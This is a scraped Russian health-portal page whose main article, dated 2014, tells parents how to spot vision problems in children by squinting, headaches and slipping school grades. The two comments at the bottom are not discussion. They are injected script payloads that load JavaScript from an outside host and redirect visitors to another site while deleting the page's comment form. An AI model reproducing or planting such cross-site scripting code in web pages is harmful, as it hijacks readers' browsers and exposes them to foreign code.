Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как понять, что у вашего ...  >>  Как понять, что у вашего ребенка проблемы со зрением
 
Обратная связь
 

Как понять, что у вашего ребенка проблемы со зрением

Размер шрифта
24 июля 2014 00:00
  • google_analytics: false
  • Нравится

У вас хорошее зрение, у вашего партнера тоже… А ребенок приносит справку с диспансеризации о том, что ему нужны очки.

Как понять, что у вашего ребенка проблемы со зрением

Поверьте, такая ситуация встречается не так уж и редко. Каждый родитель хочет сохранить здоровье своего ребенка. Как же заметить приближающиеся признаки нарушения зрения?

Обращать внимание в первую очередь стоит на эти три симптома:

Прищуривание

Если ребенок постоянно щурится (неважно пытается ли он что-то разглядеть или просто смотрит по сторонам) – это первый сигнал о том, что следует бить тревогу. Это знак того, что ребенок плохо видит объекты, расположенные вдали. Если вы замечаете, что ваш ребенок щурится больше, чем обычно, особенно при чтении или просмотре телевизора, сходите с ним к окулисту.

Постоянные головные боли

У ребенка стала часто беспричинно болеть голова? Офтальмологи говорят, что головные боли часто вызваны увеличением нагрузки на глаза. Спросите у ребенка, где именно дислоцируется боль, если она сосредоточена в передней части вокруг лба или глаз, обратитесь к окулисту.

Успеваемость в школе

Дети не всегда могут выразить словами, из-за чего происходит снижение их успеваемости в школе. Из-за того что ребенок отчетливо не видит, что именно написано на доске, даже отличники могут съехать на тройки. Поэтому если успеваемость в школе у вашего ребенка начинает снижаться, проверьте его зрение.

Помните, что чем раньше вы пресечете проблему потери зрения, и чем раньше ребенок получит лечение при помощи очков или контактных линз, тем лучше это будет для его здоровья и развития.

Еще больше советов о том, как стать идеальной мамой, вы найдете на страницах нашего специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хотите поразить людей – не заморачивайтесь о том, что снизу. Люди видят только верх!   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.